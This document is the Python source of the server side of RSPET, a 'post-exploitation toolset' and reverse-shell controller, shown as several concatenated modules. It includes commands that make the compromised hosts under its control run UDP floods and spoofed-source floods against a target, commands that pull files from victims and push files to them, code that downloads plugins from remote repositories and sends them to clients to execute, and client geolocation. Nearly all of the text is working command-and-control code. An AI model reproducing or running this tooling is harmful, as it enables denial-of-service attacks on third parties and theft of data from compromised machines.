    @command("basic")
    def available_plugins(self, server, args):
        """List plugins available online."""
        ret = [None, 0, ""]
        avail_plug = server.available_plugins()
        ret[2] += "Available Plugins:"
        for plug in avail_plug:
            plug_dct = avail_plug[plug]
            ret[2] += ("\n\t%s: %s" % (plug, plug_dct["doc"]))
        return ret

    @command("basic")
    def installed_plugins(self, server, args):
        """List installed plugins."""
        ret = [None, 0, ""]
        inst_plug = server.installed_plugins()
        ret[2] += "Installed Plugins:"
        for plug in inst_plug:
            ret[2] += ("\n\t%s: %s" % (plug, inst_plug[plug]))
        return ret

    @command("basic")
    def loaded_plugins(self, server, args):
        """List loaded plugins."""
        ret = [None, 0, ""]
        load_plug = server.plugins["loaded"]
        ret[2] += "Loaded Plugins:"
        for plug in load_plug:
            ret[2] += ("\n\t%s: %s" % (plug, load_plug[plug]))
        return ret

    ############################################################################
    ###                        Client Plugin Section                         ###
    ############################################################################
    @command("connected", "multiple")
    def client_install_plugin(self, server, args):
        """Install plugin to the selected client(s).

        Help: <plugin>"""
        ret = [None, 0, ""]
        if len(args) < 1:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["client_install_plugin"].__syntax__)
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            cmd = args[0] # Get plugin name
            hosts = server.get_selected()
            # Read contents of plugin.
            with open("Plugins/Client/" + cmd + ".client") as pl_file:
                code = pl_file.read()
            for host in hosts:
                try:
                    host.send(host.command_dict["loadPlugin"]) # Send order
                    host.send("%03d" % len(cmd)) # Send length of plugin name
                    host.send(cmd) # Send plugin name
                    host.send("%13d" % len(code)) # Send length of plugin contents
                    host.send(code) # Send plugin contents
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
        return ret

    @command("connected", "multiple")
    def plugin_command(self, server, args):
        """Execute a plugin's command to selected host(s).

        Help: <command> [args]"""
        ret = [None, 0, ""]
        if len(args) < 1:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["plugin_command"].__syntax__)
            ret[1] = 1 # Invalid Syntax Error Code
        elif args[0] not in self.__server_cmds__:
            ret[2] = ("Run 'Load_Plugin' first to load local handler.")
        else:
            cmd = args[0] # Read command from args
            args.pop(0) # Remove it from args
            hosts = server.get_selected()
            for host in hosts:
                if cmd not in host.info["commands"]:
                    ret[2] += ("Command not available on client %d" %host.id)
                    ret[0] = "basic"
                    continue
                try:
                    host.send(host.command_dict["runPluginCommand"]) # Send order
                    host.send("%03d" % len(cmd)) # Send command length
                    host.send(cmd) # Send command

                    # TODO: Decide if args are handled centrally or by local handler.

                    #host.send("%02d" % len(args)) # Send number of arguments
                    #for arg in args:
                    #    host.send("%02d" % len(arg)) # Send length of argument
                    #    host.send(arg) # Send argument

                    # Call local handler and pass remaining args
                    res = self.__server_cmds__[cmd](server, host, args)
                    ret[2] += res[2]
                    if res[0] is not None:
                        ret[0] = res[0]
                    if res[1] != 0:
                        ret[1] = res[1]
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
        return ret

    @command("basic", "connected", "multiple")
    def available_client_plugins(self, server, args):
        """Get a list of the available client plugins from the selected repos."""
        ret = [None, 0, ""]
        server.plugins["available_client"] = {}
        for base_url in server.plugins["base_url"]:
            try:
                json_file = urlopen(base_url + '/client_plugins.json')
            except HTTPError: # Plugin repo 404ed (most probably)
                server._log("E", "Error connecting to plugin repo %s" % base_url)
                ret[1] = 8 # PluginRepoUnreachable Error code
                continue
            json_dct = json.load(json_file)
            for plugin in json_dct:
                if plugin not in server.plugins["available_client"]:
                    server.plugins["available_client"][plugin] = json_dct[plugin]
            ret[2] += "Available Client Plugins"
            for plugin in server.plugins["available_client"]:
                plug_dct = server.plugins["available_client"][plugin]
                ret[2] += ("\n\t%s: %s" % (plugin, plug_dct["doc"]))
        return ret

    @command("basic", "connected", "multiple")
    def get_client_plugins(self, server, args):
        """Download Client Plugins from the selected repos.

        Help: <plugin> [plugin] [plugin] ..."""
        ret = [None, 0, ""]
        if len(args) < 1:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["get_client_plugins"].__syntax__)
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            # Force client plugin list refresh.
            self.available_client_plugins(server, args)
            avail_plug = server.plugins["available_client"]
            for plugin in args:
                try:
                    plugin_url = server.plugins["available_client"][plugin]
                except KeyError:
                    ret[2] += ("%s: plugin does not exist" % plugin)
                else:
                    # Download the plugin and write it to a file.
                    try:
                        # Download "handler" plugin
                        plugin_obj = urlopen(plugin_url + ".py")
                        plugin_cont = plugin_obj.read()
                        # Download client plugin
                        plugin_obj = urlopen(plugin_url + ".client")
                        plugin_cont_cl = plugin_obj.read()
                    except HTTPError: # Plugin repo 404ed (most probably).
                        ret[2] += ("%s: plugin not available on server." % plugin)
                        server._log("E", "%s: plugin not available on server." % plugin)
                    else:
                        # Create the file for local handler.
                        with open(("Plugins/%s.py" %plugin), 'w') as plugin_file:
                            plugin_file.write(plugin_cont)
                        # Create the file for client plugin
                        with open(("Plugins/Clinet/%s.client" %plugin), 'w') as plugin_file:
                            plugin_file.write(plugin_cont_cl)
                        ret[2] += ("%s: Clinet plugin installed." % plugin)
                        self._log("L", "%s: Clinet plugin installed" % plugin)
        return ret



from rspet.server.Plugins.mount import Plugin, command_basic

class MyPlugin(Plugin):
    """Example plugin. You can declare your commands in __server_commands__ or __host_commands__"""
    def __init__(self):
        """This function is called when the plugin is loaded"""
        print("Test plugin loaded!")

    @command_basic
    def hello(self, server, args):
        """Demo command that prints the arguments that you passed it"""
        print("You called hello with args: ", args)



"""
Plug-in module for RSPET server. Offer functions related to udp flooding.
"""
from __future__ import print_function
from socket import error as sock_error
from rspet.server.Plugins.mount import Plugin, command

class Files(Plugin):
    """
    Class expanding Plugin.
    """

    @command("connected", "multiple")
    def udp_flood(self, server, args):
        """Flood target machine with UDP packets.

        Help: <target_ip> <target_port> [payload]"""

        ret = [None,0,""]
        hosts = server.get_selected()
        if len(args) < 2:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Flood"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            try:
                # IP:port:payload
                cmd = "%s:%s:%s" % (args[0], args[1], args[2])
            except IndexError:
                cmd = "%s:%s:Hi" % (args[0], args[1])
            for host in hosts:
                try:
                    host.send(host.command_dict['udpFlood'])
                    host.send("%03d" % len(cmd))
                    host.send(cmd)
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
        return ret

    @command("connected", "multiple")
    def udp_spoof(self, server, args):
        """Flood target machine with UDP packets via spoofed ip & port.

        Help: <target_ip> <target_port> <spoofed_ip> <spoofed_port> [payload]"""

        ret = [None,0,""]
        hosts = server.get_selected()
        if len(args) < 4:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["UDP_Spoof"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            try:
                # IP:port:new_ip:new_port:payload
                cmd = "%s:%s:%s:%s:%s" % (args[0], args[1], args[2], args[3], args[4])
            except IndexError:
                cmd = "%s:%s:%s:%s:Hi" % (args[0], args[1], args[2], args[3])
            for host in hosts:
                try:
                    host.send(host.command_dict['udpSpoof'])
                    host.send("%03d" % len(cmd))
                    host.send(cmd)
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
        return ret



"""
Plug-in module for RSPET server. Offer remote file inclusion functions.
"""
from __future__ import print_function
from socket import error as sock_error
from rspet.server.Plugins.mount import Plugin, command


class Files(Plugin):
    """
    Class expanding Plugin.
    """

    @command("connected")
    def pull_file(self, server, args):
        """Pull a regular text file from the host.

        Help: <remote_file> [local_file]"""
        ret = [None,0,""]
        host = server.get_selected()[0]
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["Pull_File"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            remote_file = args[0]
            try:
                local_file = args[1]
            except IndexError:
                local_file = remote_file
            try:
                host.send(host.command_dict['sendFile'])
                host.send("%03d" % len(remote_file))
                host.send(remote_file)
                if host.recv(3) == "fna":
                    ret[2] += "File does not exist or Access Denied"
                    ret[1] = 4 # Remote Access Denied Error Code
                else:
                    try:
                        with open(local_file, "w") as file_obj:
                            filesize = int(host.recv(13))
                            file_obj.write(host.recv(filesize))
                    except IOError:
                        ret[2] += "Cannot create local file"
                        ret[1] = 3 # Local Access Denied Error Code
            except sock_error:
                host.purge()
                ret[0] = "basic"
                ret[1] = 2 # Socket Error Code
        return ret

    @command("connected")
    def pull_binary(self, server, args):
        """Pull a binary file from the host.

        Help: <remote_bin> [local_bin]"""
        ret = [None,0,""]
        host = server.get_selected()[0]
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["Pull_Binary"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            remote_file = args[0]
            try:
                local_file = args[1]
            except IndexError:
                local_file = remote_file
            try:
                host.send(host.command_dict['sendBinary'])
                host.send("%03d" % len(remote_file))
                host.send(remote_file)
                if host.recv(3) == "fna":
                    ret[2] += "File does not exist or Access Denied"
                    ret[1] = 4 # Remote Access Denied Error Code
                else:
                    try:
                        with open(local_file, "wb") as file_obj:
                            filesize = int(host.recv(13))
                            file_obj.write(host.recv(filesize))
                    except IOError:
                        ret[2] += "Cannot create local file"
                        ret[1] = 3 # Local Access Denied Error Code
            except sock_error:
                host.purge()
                ret[0] = "basic"
                ret[1] = 2 # Socket Error Code
        return ret

    @command("connected", "multiple")
    def make_file(self, server, args):
        """Send a regular text file to the host(s).

        Help: <local_file> [remote_file]"""
        ret = [None,0,""]
        hosts = server.get_selected()
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["Make_File"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            local_file = args[0]
            try:
                remote_file = args[1]
            except IndexError:
                remote_file = local_file.split("/")[-1]
            for host in hosts:
                try:
                    host.send(host.command_dict['getFile'])
                    host.send("%03d" % len(remote_file))
                    host.send(remote_file)
                    if host.recv(3) == "fna":
                        ret[2] += "Access Denied"
                        ret[1] = 4 # Remote Access Denied Error Code
                    else:
                        with open(local_file) as file_obj:
                            contents = file_obj.read()
                            host.send("%013d" % len(contents))
                            host.send(contents)
                            host.recv(3) # For future use?
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
                except IOError:
                    ret[1] = 3 # LocalAccessError Code
                    ret[2] += "File not found!"
        return ret

    @command("connected", "multiple")
    def make_binary(self, server, args):
        """Send a binary file to the host(s).

        Help: <local_bin> [remote_bin]"""
        ret = [None,0,""]
        hosts = server.get_selected()
        if len(args) == 0:
            ret[2] = ("Syntax : %s" % self.__cmd_help__["Make_Binary"])
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            local_file = args[0]
            try:
                remote_file = args[1]
            except IndexError:
                remote_file = local_file.split("/")[-1]
            for host in hosts:
                try:
                    host.send(host.command_dict['getBinary'])
                    host.send("%03d" % len(remote_file))
                    host.send(remote_file)
                    if host.recv(3) == "fna":
                        ret[2] += "Access Denied"
                        ret[1] = 4 # Remote Access Denied Error Code
                    else:
                        with open(local_file, "rb") as file_obj:
                            contents = file_obj.read()
                            host.send("%013d" % len(contents))
                            host.send(contents)
                            host.recv(3) # For future use?
                except sock_error:
                    host.purge()
                    ret[0] = "basic"
                    ret[1] = 2 # Socket Error Code
                except IOError:
                    ret[1] = 3 # LocalAccessError Code
                    ret[2] += "File not found!"
        return ret



import readline

class autocomplete(object):
    def __init__(self, options):
        self.options = sorted(options)
        return

    def complete(self, text, state):
        response = None
        if state == 0:
            if text:
                self.matches = [s
                    for s in self.options
                    if s and s.startswith(text)
                ]
            else:
                self.matches = self.options[:]

        try:
            response = self.matches[state]
        except IndexError:
            response = None
        return response


def readline_completer(words):
    readline.set_completer(autocomplete(words).complete)
    readline.parse_and_bind('tab: complete')
    readline.parse_and_bind('set completion-ignore-case on')



import re

# We use a decorator to mark a function as a command.
# Then, the PluginMount metaclass is called and it
# creates an actual object from each plugin's class
# and saves the methods needed.


class PluginMount(type):
    def __init__(cls, name, base, attr):
        """Called when a Plugin derived class is imported

        Gathers all methods needed from __cmd_states__ to __server_cmds__"""

        tmp = cls()
        for fn in cls.__cmd_states__:
            # Load the function (if its from the current plugin) and see if
            # it's marked. All plugins' commands are saved as function names
            # without saving from which plugin they come, so we have to mark
            # them and try to load them
            try:
                f = getattr(tmp, fn)
                if f.__is_command__:
                    cls.__server_cmds__[fn] = f
            except AttributeError:
                pass


# Suggestion: We could throw away the metaclass if we
# use simple functions (and not classes). Not sure if
# that would be useful
class Plugin(object):
    """Plugin class (to be extended by plugins)"""
    __metaclass__ = PluginMount

    __server_cmds__ = {}
    __cmd_states__ = {}


# Prepare the regex to parse help
regex = re.compile("(.+)\n\n\s*Help: (.+)", re.M)

def command(*states):
    def decorator(fn):
        Plugin.__cmd_states__[fn.__name__] = states

        rmatch = regex.search(fn.__doc__)
        fn.__is_command__ = True # Mark function for loading
        fn.__help__ = fn.__doc__

        if rmatch is not None:
            fn.__help__ = rmatch.groups()[0]
            fn.__syntax__ = rmatch.groups()[1]

        return fn
    return decorator



"""
Plug-in module for RSPET server. Offer Client Geolocation functionalities.
"""
from __future__ import print_function
from socket import error as sock_error
from urllib2 import urlopen, HTTPError
import time
from rspet.server.Plugins.mount import Plugin, command

class Geolocation(Plugin):
    """
    Providing a best effort client Geolocation service.
    """

    @command("basic", "connected", "multiple")
    def geolocation_config(self, server, args):
        """ Provide Google API key for the Geolocation service.

        Help: <API-Key>"""
        ret = [None, 0, ""]
        if len(args) < 1:
            ret[2] = ("Syntax : %s" % self.__server_cmds__["geolocation_config"].__syntax__)
            ret[1] = 1 #Invalid Syntax Error Code
        else:
            server.config["geo-api"] = args[0]
        return ret

    @command("connected", "multiple")
    def geo_init(self, server, host, args):
        """Initialize the Geolocation plugin on the selected client(s).

        Help: """
        ret = [None, 0, ""]
        try:
            en_data = host.recv(3)
        except sock_error:
            raise sock_error
        if en_data == 'psi':
            host.info["commands"].append("get_location")
        else:
            ret[2] = "Error Initializing the plugin on the client."
        return ret

    @command("connected", "multiple")
    def get_location(self, server, host, args):
        """ Request Geolocation information from selected host(s).

        Help: """
        ret = [None, 0, ""]
        try:
            key = server.config["geo-api"]
        except KeyError:
            ret[2] = "Plugin configuration missing. See Plugin documentation."
            ret[1] = 1 # Invalid Syntax Error Code
        else:
            host.send("%02d" % len(key))
            host.send(key)
            time.sleep(2)
            en_data = host.recv(13) # Reply json up to 9999999999999 chars
            reply = host.recv(int(en_data))
            ret[2] = reply
        return ret



#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
from setuptools import setup, find_packages


setup(
    name='rspet-server',
    version='0.4.0',
    description='Server module of the RSPET Post-Exploitation Toolset.',
    classifiers=[
        'Development Status :: 4 - Beta',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Topic :: Security',
        'Operating System :: POSIX',
        'Operating System :: Unix',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: MacOS'
    ],
    keywords='rspet post exploitation security reverse shell',
    url='https://github.com/panagiks/RSPET',
    author='panagiks',
    license='MIT',
    packages=find_packages(where='src'),
    package_dir={'': 'src'},
    namespace_packages=['rspet'],
    package_data={
        'rspet' : [
            'server/config.json',
            'server/Plugins/Client/*'
        ]
    },
    extras_require={
        'rest' : [
            'Flask',
            'flask-cors'
        ]
    },
    install_requires=[
        'certbuilder',
        'oscrypto',
        'asn1crypto'
    ],
    entry_points={
        'console_scripts' : [
            'rspet-server=rspet.server.base:main',
            'rspet-server-rest=rspet.server.api:main'
        ]
    }
)
